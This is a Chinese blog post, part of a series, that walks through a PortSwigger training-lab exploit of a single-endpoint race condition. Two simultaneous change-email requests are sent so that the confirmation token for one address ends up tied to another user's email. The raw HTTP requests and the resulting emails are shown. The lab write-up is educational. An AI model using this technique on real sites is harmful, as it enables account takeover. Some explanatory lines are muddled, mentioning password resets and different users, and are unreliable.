5种Race Conditions条件竞争漏洞,你的网站中了哪一个? [4.单点请求]

最新推荐文章于 2024-04-30 20:09:14 发布
最新推荐文章于 2024-04-30 20:09:14 发布
阅读量598 收藏 10
点赞数 20
文章标签: 安全 web安全 安全威胁分析 系统安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/raymond0820/article/details/137737498
版权

Race conditions(条件竞速)为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式中出现意外行为。

常见的攻击方法如下

  1.  饶过只限一次的申请
  2. 饶过爆力破解密码限制
  3. 饶过多步骤流程
  4. 单点请求
  5. 饶过基于时间的机制 

4.单点请求

将具有不同值的平行请求传送到单一端点有时会触发强大的竞争条件,举例如下

正常请求

wiener更改email时会在cookie中带上自己的session: XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM ,body中的email参数指定新信箱位置,如下请求

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>POST /my-account/change-email HTTP/2
Host: 0ac200cb03ab64978078499c00c800c7.web-security-academy.net
Cookie: session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM
...omit...
email=wiener%40exploit-0ae5004603a6640680c94899011d00be.exploit-server.net&csrf=hd2siI7G44fAe6A6tw0r2LjlWmFMqds1</code></span></span>

接着系统会把email更改连结寄到新信箱,内容如下

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>####### wiener@exploit-0ae5004603a6640680c94899011d00be.exploit-server.net #######
To confirm your email change to wiener@exploit-0ae5004603a6640680c94899011d00be.exploit-server.net, click the link below
Click here to confirm.</code></span></span>

确认连结点击后会送出以下请求,服务器检查是刚wiener申请的token无误后就更改为此email

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>########### request ########### 
GET /confirm-email?user=wiener&token=OP6H667c4JvNXmzh 
...omit...

########### response ###########
...omit...
Your email has been successfully updated </code></span></span>

但如果送出2次email更改请求,只有最后一个email更改连结是有用的

但由于目标有漏洞,因此将相同会话同时发送两个密码重设请求,但使用两个不同的使用者,可能会导致互相覆写

发动攻击

以wiener身份(session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM)准备2个请求同时发送:

  • 更改成wiener自己的email
  • 更改为指定email:carlos@ginandjuice.shop
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>POST /my-account/change-email HTTP/2
Host: 0ac200cb03ab64978078499c00c800c7.web-security-academy.net
Cookie: session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM
...omit...
email=carlos@ginandjuice.shop&csrf=hd2siI7G44fAe6A6tw0r2LjlWmFMqds1</code></span></span>
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>POST /my-account/change-email HTTP/2
Host: 0ac200cb03ab64978078499c00c800c7.web-security-academy.net
Cookie: session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM
...omit...
email=wiener%40exploit-0ae5004603a6640680c94899011d00be.exploit-server.net&csrf=hd2siI7G44fAe6A6tw0r2LjlWmFMqds1</code></span></span>

与是会产生2个token分别对应第一个请求token=xxxxxxxx1和第二个请求token=xxxxxxxx2

如果漏洞利用成功,原本要寄给wiener@exploit的内容就会被carlos@ginandjuice.shop的内容和token复写,被复写的内容如下。因为不一定每次都能顺利互相覆写,如果没有就多试几次。

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>####### wiener@exploit-0ae5004603a6640680c94899011d00be.exploit-server.net #######
To confirm your email change to carlos@ginandjuice.shop, click the link below
Click here to confirm.</code></span></span>

确认连结点击后会送出user=wiener&token=xxxxxxxx1,服务器检查是刚申请的第1个请求,就更改为此email

 

 其他方法可参考 Race conditions | 牛的大腦

牛的大腦-網站安全
关注
  • 20
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
5种Race Conditions条件竞争漏洞,你的网站了哪一个?[1.饶过只限一次的申请]
raymond0820的博客
04-05 219
此为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式出现意外行为。
5种Race Conditions条件竞争漏洞,你的网站了哪一个? [3.饶过多步骤流程]
raymond0820的博客
04-10 609
Race conditions(条件竞速)为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式出现意外行为。
5种Race Conditions条件竞争漏洞,你的网站了哪一个? [2.饶过爆力破解密码限制]
raymond0820的博客
04-08 317
条件竞争为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式出现意外行为。
Race conditions 条件竞争漏洞
weujie
09-12 385
2023 Black Hat USA James kettle Race conditions 条件竞争实验复现
node-js-race-conditions:一系列示例说明了Node.js竞争条件和潜在的解决方案
05-26
node-js-race-conditions 一系列示例说明了Node.js竞争条件和潜在的解决方案。 在文件夹查看代码。 :探索一个简单的竞赛条件。 :使用async/await提供一个简单的解决方案。 :提供使用互斥锁的解决方案(使用...
race-the-web:测试Web应用程序竞争条件。 包括一个RESTful API,可集成到持续集成管道
02-06
网上竞赛(RTW) 用于通过同时发送出请求的一个用户指定的号码到目标URL(或URL),然后在Web应用程序竞争条件测试比较从服务器的唯一性的响应。 包括许多配置选项。更新:现在CI兼容! 通过使用易于使用的HTTP API...
snat-race-conn-test:一小段代码,用于触发Linux的SNAT竞争条件
04-29
短跑比赛测试 nf_conntrack代码用于触发SNAT竞争条件,并因此导致nf_conntrack插入失败。 建造 $ dep ensure $ go build
web_excel.zip_Excel 网页_excel_race4gp_web 显示excel
09-24
php实现在网页显示Excel表格文件,
Race Condition漏洞
08-01
这个项目是为了展示一个易受攻击的应用程序,可以利用竞争条件攻击。
CNCERT:关于汽车数据处理4项安全要求检测情况的通报 (第一批)
最新发布
南七小僧的学海无涯
04-30 701
本次检测根据《汽车数据安全管理若干规定(试行)》有关要求,按照GB/T 41871-2022《信息安全技术 汽车数据处理安全要求》和T/CAAMTB 77-2022《汽车传输视频及图像脱敏技术要求与方法》相关技术标准,并参考《汽车数据通用要求(报批稿)》附录C组织实施。检测采用相同的测试要求、测试环境、技术标准和测试流程,包括车外人脸信息等匿名化处理、默认不收集座舱数据、座舱数据车内处理以及处理个人信息显著告知4项要求。e.查阅、复制其个人信息以及删除车内、请求删除已经提供给车外的个人信息的方式和途径;
Linux服务器安全基础 - 查看入侵痕迹
eagle89的专栏
04-30 617
Linux服务器安全基础 - 查看入侵痕迹
企业计算机服务器了rmallox勒索病毒怎么办?Rmallox勒索病毒解密流程工具
M99W1230的博客
04-26 504
在网络飞速发展的时代,企业离不开网络,网络为企业的生产运营提供了极大便利,加快了企业进步的步伐,依靠网络可以开展各项工作业务,通过网络数据整合,可以更方便企业办公。Rmallox勒索病毒属于mallox勒索家族,属于早期的勒索病毒,随着网络技术的不断发展,mallox勒索病毒做过多次升级调整,而rmallox勒索病毒是近期新升级的勒索病毒,具有较强的攻击与加密能力,一旦被攻击很难自行破解恢复,经过云天数据恢复心对rmallox勒索病毒的解密处理,为大家整理了以下有关该勒索病毒的相关信息。
网络安全实训Day16
Yisitelz的博客
04-26 694
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
百度安全多篇议题入选Blackhat Asia以硬技术发现“芯”问题
Baidu_Secrity的博客
04-24 812
因此,跨缓存攻击的效率直接决定了安卓上众多基于堆栈的漏洞利用成功率。结合这些漏洞,议题依次分析了四种威胁模型的典型漏洞案例,并介绍了Netlink相关漏洞的验证和利用方法,最后为厂商使用Netlink提供了最前沿的安全建议。百度安全是百度公司旗下以AI为核心打造的安全品牌,基于百度各业务线全技术栈的安全实践总结,在基础安全、数据安全、业务安全、车与IoT安全打造四大产品矩阵,面向行业和合作伙伴输出安全产品与行业一体化解决方案,在智能制造、智慧能源、智慧政务、智慧金融、智能汽车等领域已有丰富实践。
保序加密技术:保护数据有序性的安全方案
jiamisoft的博客
04-30 361
保序加密技术是一种特殊的加密方式,它允许对加密数据进行特定的有序操作,同时保持数据的加密状态。与传统的加密技术不同,OPE允许用户在不解密的情况下,对加密的数据进行范围搜索和比较,因为加密后的数据保持了原始数据的顺序特性。
第27天:安全开发-PHP应用&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
IceCream的博客
04-24 722
参考:https://www.kancloud.cn/manual/thinkphp5_1
基础安全:CSRF攻击原理与防范
八尺妖剑的博客
04-23 1575
这是一种常见的网络攻击手段,攻击者通过构造恶意请求,诱骗已登录的合法用户在不知情的情况下执行非本意的操作。这种攻击方式利用了Web应用程序用户身份验证的漏洞,即浏览器在用户完成登录后会自动携带相关的认证信息(如Cookie、Authorization header等)发送给服务器,使得服务器误以为请求来自已授权的用户。这是一个阳光明媚的好日子,万里无云,心情愉悦,用户哼着小曲儿兴高采烈的通过下面的请求地址登录了自己的账户并给小老婆转账520000,成功登录后在浏览器上留下了。基于上面的概念描述,
如何安全可控的进行跨区域数据交换,提高数据价值?
文件数据安全交换
04-30 509
飞驰云联是国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的大型客户,现有客户超过500家,其500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
介绍一下 promise?Promise.all和Promise.race的区别的使用场景?
12-20
Promise是JavaScript处理异步操作的一种机制。它是一种代表了异步操作最终完成或失败的对象。Promise有三种状态:pending(进行)、fulfilled(已成功)和rejected(已失败)。当一个Promise对象的状态从pending变为fulfilled或rejected时,会触发相应的回调函数。 Promise.all和Promise.race是Promise的两个静态方法,用于处理多个Promise对象。 1. Promise.all:接收一个Promise对象的可迭代参数,返回一个新的Promise对象。当所有的Promise对象都变为fulfilled状态时,新的Promise对象才会变为fulfilled状态,并返回一个包含所有Promise结果的数组。如果其一个Promise对象变为rejected状态,新的Promise对象会立即变为rejected状态,并返回第一个被rejected的Promise对象的结果。 2. Promise.race:接收一个Promise对象的可迭代参数,返回一个新的Promise对象。当其一个Promise对象变为fulfilled或rejected状态时,新的Promise对象会立即变为相同的状态,并返回第一个完成的Promise对象的结果。 使用场景: - Promise.all适用于需要等待多个异步操作全部完成后再进行下一步操作的情况,例如同时发送多个请求并等待所有请求完成后再进行数据处理。 - Promise.race适用于需要获取最快完成的异步操作结果的情况,例如多个请求同时发送,只需要获取最先返回的结果。 范例: ```javascript const promise1 = new Promise((resolve, reject) => { setTimeout(() => { resolve('Promise 1 resolved'); }, 2000); }); const promise2 = new Promise((resolve, reject) => { setTimeout(() => { resolve('Promise 2 resolved'); }, 1000); }); const promise3 = new Promise((resolve, reject) => { setTimeout(() => { reject('Promise 3 rejected'); }, 1500); }); Promise.all([promise1, promise2]) .then(results => { console.log(results); // 输出:['Promise 1 resolved', 'Promise 2 resolved'] }) .catch(error => { console.log(error); }); Promise.race([promise1, promise2, promise3]) .then(result => { console.log(result); // 输出:'Promise 2 resolved' }) .catch(error => { console.log(error); // 输出:'Promise 3 rejected' }); ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值